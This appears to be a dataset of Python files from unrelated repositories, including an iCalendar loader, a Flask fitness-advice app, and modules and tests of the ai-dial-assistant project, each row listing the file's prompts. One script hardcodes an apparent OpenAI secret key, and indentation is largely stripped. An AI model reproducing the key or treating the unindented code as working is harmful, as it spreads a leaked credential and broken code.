for character in decoded_sequence:
if character.isalpha() is False:
continue
character_range = unicode_range(character) # type: Optional[str]
if character_range is None:
continue
layer_target_range = None # type: Optional[str]
for discovered_range in layers:
if (
is_suspiciously_successive_range(discovered_range, character_range)
is False
):
layer_target_range = discovered_range
break
if layer_target_range is None:
layer_target_range = character_range
if layer_target_range not in layers:
layers[layer_target_range] = character.lower()
continue
layers[layer_target_range] += character.lower()
return list(layers.values())
def merge_coherence_ratios(results: List[CoherenceMatches]) -> CoherenceMatches:
"""
    This function merges results previously given by the function coherence_ratio.
The return type is the same as coherence_ratio.
"""
per_language_ratios = {} # type: Dict[str, List[float]]
merge = [] # type: CoherenceMatches
for result in results:
for sub_result in result:
language, ratio = sub_result
if language not in per_language_ratios:
per_language_ratios[language] = [ratio]
continue
per_language_ratios[language].append(ratio)
for language in per_language_ratios:
merge.append(
(
language,
round(
sum(per_language_ratios[language])
/ len(per_language_ratios[language]),
4,
),
)
)
return sorted(merge, key=lambda x: x[1], reverse=True)
@lru_cache(maxsize=2048)
def coherence_ratio(
decoded_sequence: str, threshold: float = 0.1, lg_inclusion: Optional[str] = None
) -> CoherenceMatches:
"""
    Detect ANY language that can be identified in the given sequence. The sequence will be analysed by layers.
A layer = Character extraction by alphabets/ranges.
"""
results = [] # type: List[Tuple[str, float]]
lg_inclusion_list = [] # type: List[str]
sufficient_match_count = 0 # type: int
if lg_inclusion is not None:
lg_inclusion_list = lg_inclusion.split(",")
if "Latin Based" in lg_inclusion_list:
lg_inclusion_list.remove("Latin Based")
for layer in alpha_unicode_split(decoded_sequence):
sequence_frequencies = Counter(layer) # type: Counter
most_common = sequence_frequencies.most_common()
character_count = sum([o for c, o in most_common]) # type: int
if character_count <= 32:
continue
popular_character_ordered = [c for c, o in most_common] # type: List[str]
for language in lg_inclusion_list or alphabet_languages(
popular_character_ordered
):
ratio = characters_popularity_compare(
language, popular_character_ordered
) # type: float
if ratio < threshold:
continue
elif ratio >= 0.8:
sufficient_match_count += 1
results.append((language, round(ratio, 4)))
if sufficient_match_count >= 3:
break
return sorted(results, key=lambda x: x[1], reverse=True)
| [] |
2024-01-10 | anhquande/chatgpt | loaders~ical_loader.py | from icalendar import Calendar
from langchain.document_loaders.directory import DirectoryLoader
from pydantic import BaseModel, Field
import logging
from datetime import datetime
from typing import Optional
class Event(BaseModel):
summary: Optional[str] = Field(default=None, allow_none=True)
description: Optional[str] = Field(default=None, allow_none=True)
start_time: datetime
end_time: Optional[datetime] = Field(default=None, allow_none=True)
page_content: Optional[str] = Field(default=None, allow_none=True)
metadata: Optional[dict] = Field(default=None, allow_none=True)
def __init__(self, summary: Optional[str] = None,
description: Optional[str] = None,
start_time: datetime = None,
end_time: Optional[datetime] = None,
metadata: Optional[dict] = None,
):
super().__init__(summary=summary, description=description, start_time=start_time, end_time=end_time, metadata=metadata)
self.page_content = f"{summary or ''} {description or ''}"
class ICalLoader(DirectoryLoader):
def __init__(self, folder):
super().__init__(folder, glob='*.ics')
self.logger = logging.getLogger(__name__) # Initialize logger
def _is_visible(self, p):
parts = p.parts
for _p in parts:
if _p.startswith("."):
return False
return True
def load_file(self, item, path, docs, pbar=None):
if item.is_file():
if self._is_visible(item.relative_to(path)) or self.load_hidden:
try:
with open(item, 'rb') as f:
cal = Calendar.from_ical(f.read())
# Process the iCalendar events as desired
for component in cal.walk():
if component.name == 'VEVENT':
# Extract event properties and create a document object
summary = component.get('summary')
description = component.get('description')
start_time = datetime.fromisoformat(component.get('dtstart').dt.isoformat())
end_time = component.get('dtend')
if end_time is not None:
end_time = datetime.fromisoformat(end_time.dt.isoformat())
event = Event(
summary=summary,
description=description,
start_time=start_time,
end_time=end_time,
metadata = {'source': 'google calendar'}
)
# Create a document object and append it to the list
docs.append(event)
except Exception as e:
                    if self.silent_errors:
                        self.logger.warning(e)
else:
raise e
finally:
if pbar:
pbar.update(1)
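# Usage sketch (assuming the standard DirectoryLoader.load() entry point):
#     loader = ICalLoader("path/to/calendars")
#     events = loader.load()  # Event objects built from every *.ics file in the folder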
| [] |
2024-01-10 | gochipon/DIS23-d | shedule.py | import openai
openai.api_key = "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"
def Ask_ChatGPT(message):
    # Build the chat completion request
completion = openai.ChatCompletion.create(
model = "gpt-3.5-turbo",
messages = [{
"role":"system",
"content":'あなたは優秀なアシスタントです。'},
{
"role":"user",
"content":message,
}],
max_tokens = 1024,
n = 1,
stop = None,
temperature = 0.5,
)
    # Extract the response text
response = completion.choices[0].message["content"]
    # Return the response content
return response
# Get the user's goal
goal = input("あなたの達成したい目標は何ですか?: ")
# Get the deadline
deadline = input("その目標の達成期限はいつですか?: ")
# Have GPT generate a one-week schedule
prompt = f"私は{goal}を{deadline}までに達成したい。今日からの1週間のスケジュールをjson形式で提案してください。"
message = Ask_ChatGPT(prompt)
# print(response)
print(message) | [
"あなたは優秀なアシスタントです。",
"私はPLACEHOLDERをPLACEHOLDERまでに達成したい。今日からの1週間のスケジュールをjson形式で提案してください。"
] |
2024-01-10 | Ahmed98041/completefitnessgpt | FlaskGym.py | from flask import Flask, request, jsonify
from flask_cors import CORS # Importing the CORS library
import openai
import os
from dotenv import load_dotenv
# Load the environment variables from the .env file
load_dotenv('key.env')
# Set up your OpenAI API key
openai.api_key = os.getenv('OPENAI_API_KEY')
app = Flask(__name__, static_folder='static')
# Enable CORS for all origins
CORS(app)
def fitness_evaluation(age, height_meters, weight_kg, gender, activity_levels_1highest, free_time_daily_hours, a_pwd, additional_info, user_goals, target_muscles, available_days, existing_workout_plan):
messages = []
messages.append({
"role": "system",
"content": "You are a specialized fitness AI tasked with generating detailed and personalized fitness and diet plans for individuals based on a variety of input parameters. Your task is to create a tailored plan that takes into consideration the user's age, height, weight, gender, activity level, daily free time, personal goals, target muscles, available days for workouts, and existing workout plans. Please divide the output into two sections: a fitness plan and a diet plan. The fitness plan should be presented in a grid format where each cell represents a day and outlines the workouts targeting the specified muscles for that day. The diet plan should complement the fitness plan and be structured according to different meals throughout the day. Make sure to craft plans that suit a wide range of demographics."
})
pwd = "a pwd" if a_pwd else "not a pwd"
additional_info = additional_info if additional_info else "nothing"
message = f"Give a person with age of {age}, height of {height_meters} meters, weight of {weight_kg} kg, activity levels of {activity_levels_1highest} with 1 being the highest activity level, free time daily of {free_time_daily_hours} in hours, is {pwd}, and has additional info of {additional_info}. User goals: {user_goals}. Target muscles: {', '.join(target_muscles)}. Available days: {', '.join(available_days)}. Existing workout plan: {existing_workout_plan}"
messages.append({"role": "user", "content": message})
response = openai.ChatCompletion.create(
model="gpt-4",
messages=messages,
temperature=0.7,
)
reply = response["choices"][0]["message"]["content"]
fitness_advice = [{"title": "Fitness Advice", "content": reply}]
return fitness_advice
@app.route("/fitness_advice", methods=["POST"])
def get_fitness_advice():
# Get user inputs from the JSON body
data = request.get_json()
age = data["age"]
height_meters = float(data["height_meters"])
weight_kg = int(data["weight_kg"])
gender = data["gender"]
activity_levels_1highest = data["activity_levels_1highest"]
free_time_daily_hours = float(data["free_time_daily_hours"])
a_pwd = data["a_pwd"]
additional_info = data["additional_info"]
user_goals = data["user_goals"]
target_muscles = data["target_muscles"]
available_days = data["available_days"]
existing_workout_plan = data["existing_workout_plan"]
# Call the fitness_evaluation function and get the results
fitness_advice = fitness_evaluation(age, height_meters, weight_kg, gender, activity_levels_1highest, free_time_daily_hours, a_pwd, additional_info, user_goals, target_muscles, available_days, existing_workout_plan)
return jsonify(fitness_advice=fitness_advice)
if __name__ == "__main__":
app.run(debug=True)
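# A minimal usage sketch for the endpoint above (values are illustrative only; assumes the
# default Flask development server address and the `requests` package):
#   import requests
#   payload = {"age": 25, "height_meters": 1.75, "weight_kg": 70, "gender": "male",
#              "activity_levels_1highest": 2, "free_time_daily_hours": 1.5, "a_pwd": False,
#              "additional_info": "", "user_goals": "build muscle",
#              "target_muscles": ["chest", "back"], "available_days": ["Monday", "Wednesday"],
#              "existing_workout_plan": "none"}
#   r = requests.post("http://127.0.0.1:5000/fitness_advice", json=payload)
#   print(r.json()["fitness_advice"][0]["content"])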
| [
"f\"Give a person with age of {age}, height of {height_meters} meters, weight of {weight_kg} kg, activity levels of {activity_levels_1highest} with 1 being the highest activity level, free time daily of {free_time_daily_hours} in hours, is {pwd}, and has additional info of {additional_info}. User goals: {user_goals}. Target muscles: {', '.join(target_muscles)}. Available days: {', '.join(available_days)}. Existing workout plan: {existing_workout_plan}",
"You are a specialized fitness AI tasked with generating detailed and personalized fitness and diet plans for individuals based on a variety of input parameters. Your task is to create a tailored plan that takes into consideration the user's age, height, weight, gender, activity level, daily free time, personal goals, target muscles, available days for workouts, and existing workout plans. Please divide the output into two sections: a fitness plan and a diet plan. The fitness plan should be presented in a grid format where each cell represents a day and outlines the workouts targeting the specified muscles for that day. The diet plan should complement the fitness plan and be structured according to different meals throughout the day. Make sure to craft plans that suit a wide range of demographics."
] |
2024-01-10 | epam/ai-dial-assistant | tests~unit_tests~chain~test_command_chain_best_effort.py | import json
from unittest.mock import MagicMock, Mock, call
import pytest
from aidial_sdk.chat_completion import Role
from jinja2 import Template
from openai import InvalidRequestError
from aidial_assistant.chain.callbacks.chain_callback import ChainCallback
from aidial_assistant.chain.callbacks.result_callback import ResultCallback
from aidial_assistant.chain.command_chain import (
CommandChain,
LimitExceededException,
ModelRequestLimiter,
)
from aidial_assistant.chain.history import History, ScopedMessage
from aidial_assistant.commands.base import Command, TextResult
from aidial_assistant.model.model_client import Message, ModelClient
from tests.utils.async_helper import to_async_string, to_async_strings
SYSTEM_MESSAGE = "<system message>"
USER_MESSAGE = "<user message>"
ENFORCE_JSON_FORMAT = "\n\n**Protocol reminder: reply with commands**"
BEST_EFFORT_ANSWER = "<best effort answer>"
NO_TOKENS_ERROR = "No tokens left"
FAILED_PROTOCOL_ERROR = "The next constructed API request is incorrect."
LIMIT_EXCEEDED_ERROR = "<limit exceeded error>"
TEST_COMMAND_NAME = "<test command>"
TEST_COMMAND_OUTPUT = "<test command result>"
TEST_COMMAND_REQUEST = json.dumps(
{"commands": [{"command": TEST_COMMAND_NAME, "args": ["test_arg"]}]}
)
TEST_COMMAND_RESPONSE = json.dumps(
{"responses": [{"status": "SUCCESS", "response": TEST_COMMAND_OUTPUT}]}
)
TEST_HISTORY = History(
assistant_system_message_template=Template(
"system_prefix={{system_prefix}}"
),
best_effort_template=Template(
"user_message={{message}}, error={{error}}, dialogue={{dialogue}}"
),
scoped_messages=[
ScopedMessage(
message=Message(role=Role.SYSTEM, content=SYSTEM_MESSAGE)
),
ScopedMessage(message=Message(role=Role.USER, content=USER_MESSAGE)),
],
)
@pytest.mark.asyncio
async def test_model_doesnt_support_protocol():
model_client = Mock(spec=ModelClient)
model_client.agenerate.side_effect = to_async_strings(
["cannot reply in JSON format", BEST_EFFORT_ANSWER]
)
command_chain = CommandChain(
name="TEST",
model_client=model_client,
command_dict={},
max_retry_count=0,
)
chain_callback = Mock(spec=ChainCallback)
result_callback = Mock(spec=ResultCallback)
chain_callback.result_callback.return_value = result_callback
await command_chain.run_chat(history=TEST_HISTORY, callback=chain_callback)
assert chain_callback.on_error.call_args_list == [
call("Error", "The model failed to construct addon request."),
]
assert result_callback.on_result.call_args_list == [
call(BEST_EFFORT_ANSWER)
]
assert model_client.agenerate.call_args_list == [
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(f"{USER_MESSAGE}{ENFORCE_JSON_FORMAT}"),
]
),
call(
[
Message.system(SYSTEM_MESSAGE),
Message.user(USER_MESSAGE),
]
),
]
@pytest.mark.asyncio
async def test_model_partially_supports_protocol():
model_client = Mock(spec=ModelClient)
model_client.agenerate.side_effect = to_async_strings(
[
TEST_COMMAND_REQUEST,
"cannot reply in JSON format anymore",
BEST_EFFORT_ANSWER,
]
)
test_command = Mock(spec=Command)
test_command.execute.return_value = TextResult(TEST_COMMAND_OUTPUT)
command_chain = CommandChain(
name="TEST",
model_client=model_client,
command_dict={TEST_COMMAND_NAME: lambda *_: test_command},
max_retry_count=0,
)
chain_callback = MagicMock(spec=ChainCallback)
result_callback = Mock(spec=ResultCallback)
chain_callback.result_callback.return_value = result_callback
succeeded_dialogue = [
Message.assistant(TEST_COMMAND_REQUEST),
Message.user(TEST_COMMAND_RESPONSE),
]
await command_chain.run_chat(history=TEST_HISTORY, callback=chain_callback)
assert chain_callback.on_error.call_args_list == [
call("Error", "The model failed to construct addon request."),
]
assert result_callback.on_result.call_args_list == [
call(BEST_EFFORT_ANSWER)
]
assert model_client.agenerate.call_args_list == [
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(f"{USER_MESSAGE}{ENFORCE_JSON_FORMAT}"),
]
),
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(USER_MESSAGE),
Message.assistant(TEST_COMMAND_REQUEST),
Message.user(f"{TEST_COMMAND_RESPONSE}{ENFORCE_JSON_FORMAT}"),
]
),
call(
[
Message.system(SYSTEM_MESSAGE),
Message.user(
f"user_message={USER_MESSAGE}, error={FAILED_PROTOCOL_ERROR}, dialogue={succeeded_dialogue}"
),
]
),
]
@pytest.mark.asyncio
async def test_no_tokens_for_tools():
model_client = Mock(spec=ModelClient)
model_client.agenerate.side_effect = [
to_async_string(TEST_COMMAND_REQUEST),
InvalidRequestError(NO_TOKENS_ERROR, ""),
to_async_string(BEST_EFFORT_ANSWER),
]
test_command = Mock(spec=Command)
test_command.execute.return_value = TextResult(TEST_COMMAND_OUTPUT)
command_chain = CommandChain(
name="TEST",
model_client=model_client,
command_dict={TEST_COMMAND_NAME: lambda *_: test_command},
max_retry_count=0,
)
chain_callback = MagicMock(spec=ChainCallback)
result_callback = Mock(spec=ResultCallback)
chain_callback.result_callback.return_value = result_callback
await command_chain.run_chat(history=TEST_HISTORY, callback=chain_callback)
assert chain_callback.on_error.call_args_list == [
call("Error", NO_TOKENS_ERROR)
]
assert result_callback.on_result.call_args_list == [
call(BEST_EFFORT_ANSWER)
]
assert model_client.agenerate.call_args_list == [
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(f"{USER_MESSAGE}{ENFORCE_JSON_FORMAT}"),
]
),
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(USER_MESSAGE),
Message.assistant(TEST_COMMAND_REQUEST),
Message.user(f"{TEST_COMMAND_RESPONSE}{ENFORCE_JSON_FORMAT}"),
]
),
call(
[
Message.system(SYSTEM_MESSAGE),
Message.user(
f"user_message={USER_MESSAGE}, error={NO_TOKENS_ERROR}, dialogue=[]"
),
]
),
]
@pytest.mark.asyncio
async def test_model_request_limit_exceeded():
model_client = Mock(spec=ModelClient)
model_client.agenerate.side_effect = to_async_strings(
[TEST_COMMAND_REQUEST, BEST_EFFORT_ANSWER]
)
test_command = Mock(spec=Command)
test_command.execute.return_value = TextResult(TEST_COMMAND_OUTPUT)
command_chain = CommandChain(
name="TEST",
model_client=model_client,
command_dict={TEST_COMMAND_NAME: lambda *_: test_command},
max_retry_count=0,
)
chain_callback = MagicMock(spec=ChainCallback)
result_callback = Mock(spec=ResultCallback)
chain_callback.result_callback.return_value = result_callback
model_request_limiter = Mock(spec=ModelRequestLimiter)
model_request_limiter.verify_limit.side_effect = [
None,
LimitExceededException(LIMIT_EXCEEDED_ERROR),
]
await command_chain.run_chat(
history=TEST_HISTORY,
callback=chain_callback,
model_request_limiter=model_request_limiter,
)
assert result_callback.on_result.call_args_list == [
call(BEST_EFFORT_ANSWER)
]
assert model_client.agenerate.call_args_list == [
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(f"{USER_MESSAGE}{ENFORCE_JSON_FORMAT}"),
]
),
call(
[
Message.system(SYSTEM_MESSAGE),
Message.user(
f"user_message={USER_MESSAGE}, error={LIMIT_EXCEEDED_ERROR}, dialogue=[]"
),
]
),
]
assert model_request_limiter.verify_limit.call_args_list == [
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(f"{USER_MESSAGE}{ENFORCE_JSON_FORMAT}"),
]
),
call(
[
Message.system(f"system_prefix={SYSTEM_MESSAGE}"),
Message.user(USER_MESSAGE),
Message.assistant(TEST_COMMAND_REQUEST),
Message.user(f"{TEST_COMMAND_RESPONSE}{ENFORCE_JSON_FORMAT}"),
]
),
]
| [
"<system message>",
"<user message>"
] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~utils~exceptions.py | import logging
from functools import wraps
from aidial_sdk import HTTPException
from openai import OpenAIError
logger = logging.getLogger(__name__)
class RequestParameterValidationError(Exception):
def __init__(self, message: str, param: str, *args: object) -> None:
super().__init__(message, *args)
self._param = param
@property
def param(self) -> str:
return self._param
def _to_http_exception(e: Exception) -> HTTPException:
if isinstance(e, RequestParameterValidationError):
return HTTPException(
message=str(e),
status_code=422,
type="invalid_request_error",
param=e.param,
)
if isinstance(e, OpenAIError):
http_status = e.http_status or 500
if e.error:
return HTTPException(
message=e.error.message,
status_code=http_status,
type=e.error.type,
code=e.error.code,
param=e.error.param,
)
return HTTPException(message=str(e), status_code=http_status)
return HTTPException(
message=str(e), status_code=500, type="internal_server_error"
)
def unhandled_exception_handler(func):
@wraps(func)
async def wrapper(*args, **kwargs):
try:
return await func(*args, **kwargs)
except Exception as e:
logger.exception("Unhandled exception")
raise _to_http_exception(e)
return wrapper
| [] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~open_api~operation_selector.py | import json
from typing import Union
from urllib.parse import urljoin
from langchain.tools import APIOperation, OpenAPISpec
from pydantic import BaseModel
class OpenAPICommand(BaseModel):
command: str
args: dict
class OpenAPIClarification(BaseModel):
user_question: str
OpenAPIResponse = Union[OpenAPICommand, OpenAPIClarification]
class OpenAPIResponseWrapper(BaseModel):
"""Just a wrapper class for the union to ease parsing"""
resp: OpenAPIResponse
@staticmethod
def parse_str(s) -> OpenAPIResponse:
return OpenAPIResponseWrapper.parse_obj({"resp": json.loads(s)}).resp
OpenAPIOperations = dict[str, APIOperation]
def collect_operations(spec: OpenAPISpec, spec_url: str) -> OpenAPIOperations:
operations: dict[str, APIOperation] = {}
def add_operation(spec, path, method):
operation = APIOperation.from_openapi_spec(spec, path, method) # type: ignore
operation.base_url = urljoin(spec_url, operation.base_url)
operations[operation.operation_id] = operation
if spec.paths is None: # type: ignore
return operations
for path, path_item in spec.paths.items(): # type: ignore
if path_item.get is not None:
add_operation(spec, path, "get")
if path_item.post is not None:
add_operation(spec, path, "post")
return operations
| [] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~model~model_client.py | from abc import ABC
from typing import Any, AsyncIterator, List, TypedDict
import openai
from aidial_sdk.chat_completion import Role
from aiohttp import ClientSession
from pydantic import BaseModel
class ReasonLengthException(Exception):
pass
class Message(BaseModel):
role: Role
content: str
def to_openai_message(self) -> dict[str, str]:
return {"role": self.role.value, "content": self.content}
@classmethod
def system(cls, content):
return cls(role=Role.SYSTEM, content=content)
@classmethod
def user(cls, content):
return cls(role=Role.USER, content=content)
@classmethod
def assistant(cls, content):
return cls(role=Role.ASSISTANT, content=content)
class Usage(TypedDict):
prompt_tokens: int
completion_tokens: int
class ExtraResultsCallback:
def on_discarded_messages(self, discarded_messages: int):
pass
def on_prompt_tokens(self, prompt_tokens: int):
pass
async def _flush_stream(stream: AsyncIterator[str]):
try:
async for _ in stream:
pass
except ReasonLengthException:
pass
class ModelClient(ABC):
def __init__(
self,
model_args: dict[str, Any],
buffer_size: int,
):
self.model_args = model_args
self.buffer_size = buffer_size
self._total_prompt_tokens: int = 0
self._total_completion_tokens: int = 0
async def agenerate(
self,
messages: List[Message],
extra_results_callback: ExtraResultsCallback | None = None,
**kwargs,
) -> AsyncIterator[str]:
async with ClientSession(read_bufsize=self.buffer_size) as session:
openai.aiosession.set(session)
model_result = await openai.ChatCompletion.acreate(
messages=[message.to_openai_message() for message in messages],
**self.model_args | kwargs,
)
finish_reason_length = False
async for chunk in model_result: # type: ignore
usage: Usage | None = chunk.get("usage")
if usage:
prompt_tokens = usage["prompt_tokens"]
self._total_prompt_tokens += prompt_tokens
self._total_completion_tokens += usage["completion_tokens"]
if extra_results_callback:
extra_results_callback.on_prompt_tokens(prompt_tokens)
if extra_results_callback:
discarded_messages: int | None = chunk.get(
"statistics", {}
).get("discarded_messages")
if discarded_messages is not None:
extra_results_callback.on_discarded_messages(
discarded_messages
)
choice = chunk["choices"][0]
text = choice["delta"].get("content")
if text:
yield text
if choice.get("finish_reason") == "length":
finish_reason_length = True
if finish_reason_length:
raise ReasonLengthException()
# TODO: Use a dedicated endpoint for counting tokens.
# This request may throw an error if the number of tokens is too large.
async def count_tokens(self, messages: list[Message]) -> int:
class PromptTokensCallback(ExtraResultsCallback):
def __init__(self):
self.token_count: int | None = None
def on_prompt_tokens(self, prompt_tokens: int):
self.token_count = prompt_tokens
callback = PromptTokensCallback()
await _flush_stream(
self.agenerate(
messages, extra_results_callback=callback, max_tokens=1
)
)
if callback.token_count is None:
raise Exception("No token count received.")
return callback.token_count
# TODO: Use a dedicated endpoint for discarded_messages.
async def get_discarded_messages(
self, messages: list[Message], max_prompt_tokens: int
) -> int:
class DiscardedMessagesCallback(ExtraResultsCallback):
def __init__(self):
self.message_count: int | None = None
def on_discarded_messages(self, discarded_messages: int):
self.message_count = discarded_messages
callback = DiscardedMessagesCallback()
await _flush_stream(
self.agenerate(
messages,
extra_results_callback=callback,
max_prompt_tokens=max_prompt_tokens,
max_tokens=1,
)
)
if callback.message_count is None:
raise Exception("No message count received.")
return callback.message_count
@property
def total_prompt_tokens(self) -> int:
return self._total_prompt_tokens
@property
def total_completion_tokens(self) -> int:
return self._total_completion_tokens
| [
"prompt_tokens"
] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~chain~command_chain.py | import json
import logging
from abc import ABC, abstractmethod
from typing import Any, AsyncIterator, Callable, Tuple, cast
from aidial_sdk.chat_completion.request import Role
from openai import InvalidRequestError
from aidial_assistant.application.prompts import ENFORCE_JSON_FORMAT_TEMPLATE
from aidial_assistant.chain.callbacks.chain_callback import ChainCallback
from aidial_assistant.chain.callbacks.command_callback import CommandCallback
from aidial_assistant.chain.callbacks.result_callback import ResultCallback
from aidial_assistant.chain.command_result import (
CommandInvocation,
CommandResult,
Status,
commands_to_text,
responses_to_text,
)
from aidial_assistant.chain.dialogue import Dialogue, DialogueTurn
from aidial_assistant.chain.history import History
from aidial_assistant.chain.model_response_reader import (
AssistantProtocolException,
CommandsReader,
skip_to_json_start,
)
from aidial_assistant.commands.base import Command, FinalCommand
from aidial_assistant.json_stream.chunked_char_stream import ChunkedCharStream
from aidial_assistant.json_stream.exceptions import JsonParsingException
from aidial_assistant.json_stream.json_node import JsonNode
from aidial_assistant.json_stream.json_parser import JsonParser
from aidial_assistant.json_stream.json_string import JsonString
from aidial_assistant.model.model_client import Message, ModelClient
from aidial_assistant.utils.stream import CumulativeStream
logger = logging.getLogger(__name__)
DEFAULT_MAX_RETRY_COUNT = 3
# Some relatively large number to avoid CxSAST warning about potential DoS attack.
# Later, the upper limit will be provided by the DIAL Core (proxy).
MAX_MODEL_COMPLETION_CHUNKS = 32000
CommandConstructor = Callable[[], Command]
CommandDict = dict[str, CommandConstructor]
class LimitExceededException(Exception):
pass
class ModelRequestLimiter(ABC):
@abstractmethod
async def verify_limit(self, messages: list[Message]):
pass
class CommandChain:
def __init__(
self,
name: str,
model_client: ModelClient,
command_dict: CommandDict,
max_completion_tokens: int | None = None,
max_retry_count: int = DEFAULT_MAX_RETRY_COUNT,
):
self.name = name
self.model_client = model_client
self.command_dict = command_dict
self.model_extra_args = (
{}
if max_completion_tokens is None
else {"max_tokens": max_completion_tokens}
)
self.max_retry_count = max_retry_count
def _log_message(self, role: Role, content: str):
logger.debug(f"[{self.name}] {role.value}: {content}")
def _log_messages(self, messages: list[Message]):
if logger.isEnabledFor(logging.DEBUG):
for message in messages:
self._log_message(message.role, message.content)
async def run_chat(
self,
history: History,
callback: ChainCallback,
model_request_limiter: ModelRequestLimiter | None = None,
):
dialogue = Dialogue()
try:
messages = history.to_protocol_messages()
while True:
dialogue_turn = await self._run_with_protocol_failure_retries(
callback,
messages + dialogue.messages,
model_request_limiter,
)
if dialogue_turn is None:
break
dialogue.append(dialogue_turn)
except (JsonParsingException, AssistantProtocolException):
messages = (
history.to_best_effort_messages(
"The next constructed API request is incorrect.",
dialogue,
)
if not dialogue.is_empty()
else history.to_user_messages()
)
await self._generate_result(messages, callback)
except (InvalidRequestError, LimitExceededException) as e:
if dialogue.is_empty() or (
isinstance(e, InvalidRequestError) and e.code == "429"
):
raise
# Assuming the context length is exceeded
dialogue.pop()
# TODO: Limit the error message size. The error message should not exceed reserved assistant overheads.
await self._generate_result(
history.to_best_effort_messages(str(e), dialogue), callback
)
async def _run_with_protocol_failure_retries(
self,
callback: ChainCallback,
messages: list[Message],
model_request_limiter: ModelRequestLimiter | None = None,
) -> DialogueTurn | None:
last_error: Exception | None = None
try:
self._log_messages(messages)
retries = Dialogue()
while True:
all_messages = self._reinforce_json_format(
messages + retries.messages
)
if model_request_limiter:
await model_request_limiter.verify_limit(all_messages)
chunk_stream = CumulativeStream(
self.model_client.agenerate(
all_messages, **self.model_extra_args # type: ignore
)
)
try:
commands, responses = await self._run_commands(
chunk_stream, callback
)
if responses:
request_text = commands_to_text(commands)
response_text = responses_to_text(responses)
callback.on_state(request_text, response_text)
return DialogueTurn(
assistant_message=request_text,
user_message=response_text,
)
break
except (JsonParsingException, AssistantProtocolException) as e:
logger.exception("Failed to process model response")
retry_count = retries.dialogue_turn_count()
callback.on_error(
"Error"
if retry_count == 0
else f"Error (retry {retry_count})",
"The model failed to construct addon request.",
)
if retry_count >= self.max_retry_count:
raise
last_error = e
retries.append(
DialogueTurn(
assistant_message=chunk_stream.buffer,
user_message="Failed to parse JSON commands: "
+ str(e),
)
)
finally:
self._log_message(Role.ASSISTANT, chunk_stream.buffer)
except (InvalidRequestError, LimitExceededException) as e:
if last_error:
# Retries can increase the prompt size, which may lead to token overflow.
# Thus, if the original error was a protocol error, it should be thrown instead.
raise last_error
callback.on_error("Error", str(e))
raise
async def _run_commands(
self, chunk_stream: AsyncIterator[str], callback: ChainCallback
) -> Tuple[list[CommandInvocation], list[CommandResult]]:
char_stream = ChunkedCharStream(chunk_stream)
await skip_to_json_start(char_stream)
root_node = await JsonParser().parse(char_stream)
commands: list[CommandInvocation] = []
responses: list[CommandResult] = []
request_reader = CommandsReader(root_node)
async for invocation in request_reader.parse_invocations():
command_name = await invocation.parse_name()
command = self._create_command(command_name)
args = invocation.parse_args()
if isinstance(command, FinalCommand):
if len(responses) > 0:
continue
message = await anext(args)
await CommandChain._to_result(
message
if isinstance(message, JsonString)
else message.to_chunks(),
callback.result_callback(),
)
break
else:
response = await CommandChain._execute_command(
command_name, command, args, callback
)
commands.append(
cast(CommandInvocation, invocation.node.value())
)
responses.append(response)
return commands, responses
def _create_command(self, name: str) -> Command:
if name not in self.command_dict:
raise AssistantProtocolException(
f"The command '{name}' is expected to be one of {[*self.command_dict.keys()]}"
)
return self.command_dict[name]()
async def _generate_result(
self, messages: list[Message], callback: ChainCallback
):
stream = self.model_client.agenerate(messages)
await CommandChain._to_result(stream, callback.result_callback())
@staticmethod
def _reinforce_json_format(messages: list[Message]) -> list[Message]:
last_message = messages[-1]
return messages[:-1] + [
Message(
role=last_message.role,
content=ENFORCE_JSON_FORMAT_TEMPLATE.render(
response=last_message.content
),
),
]
@staticmethod
async def _to_args(
args: AsyncIterator[JsonNode], callback: CommandCallback
) -> AsyncIterator[Any]:
args_callback = callback.args_callback()
args_callback.on_args_start()
async for arg in args:
arg_callback = args_callback.arg_callback()
arg_callback.on_arg_start()
result = ""
async for chunk in arg.to_chunks():
arg_callback.on_arg(chunk)
result += chunk
arg_callback.on_arg_end()
yield json.loads(result)
args_callback.on_args_end()
@staticmethod
async def _to_result(stream: AsyncIterator[str], callback: ResultCallback):
try:
for _ in range(MAX_MODEL_COMPLETION_CHUNKS):
chunk = await anext(stream)
callback.on_result(chunk)
logger.warning(
f"Max chunk count of {MAX_MODEL_COMPLETION_CHUNKS} exceeded in the reply"
)
except StopAsyncIteration:
pass
@staticmethod
async def _execute_command(
name: str,
command: Command,
args: AsyncIterator[JsonNode],
chain_callback: ChainCallback,
) -> CommandResult:
try:
with chain_callback.command_callback() as command_callback:
command_callback.on_command(name)
args_list = [
arg
async for arg in CommandChain._to_args(
args, command_callback
)
]
response = await command.execute(
args_list, command_callback.execution_callback()
)
command_callback.on_result(response)
return {"status": Status.SUCCESS, "response": response.text}
except Exception as e:
logger.exception(f"Failed to execute command {name}")
return {"status": Status.ERROR, "response": str(e)}
| [] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~commands~open_api.py | from typing import Any, List
from langchain.tools.openapi.utils.api_models import APIOperation
from typing_extensions import override
from aidial_assistant.commands.base import (
Command,
ExecutionCallback,
ResultObject,
)
from aidial_assistant.open_api.requester import OpenAPIEndpointRequester
class OpenAPIChatCommand(Command):
@staticmethod
def token() -> str:
return "open-api-chat-command"
def __init__(self, op: APIOperation, plugin_auth: str | None):
self.op = op
self.plugin_auth = plugin_auth
@override
async def execute(
self, args: List[Any], execution_callback: ExecutionCallback
) -> ResultObject:
self.assert_arg_count(args, 1)
return await OpenAPIEndpointRequester(
self.op, self.plugin_auth
).execute(args[0])
| [] |
2024-01-10 | epam/ai-dial-assistant | aidial_assistant~utils~open_ai_plugin.py | import logging
from typing import Iterable, Mapping
from urllib.parse import urljoin
from aiocache import cached
from aiohttp import hdrs
from fastapi import HTTPException
from langchain.tools import OpenAPISpec
from pydantic import BaseModel, parse_obj_as
from starlette.status import HTTP_401_UNAUTHORIZED
from aidial_assistant.utils.requests import aget
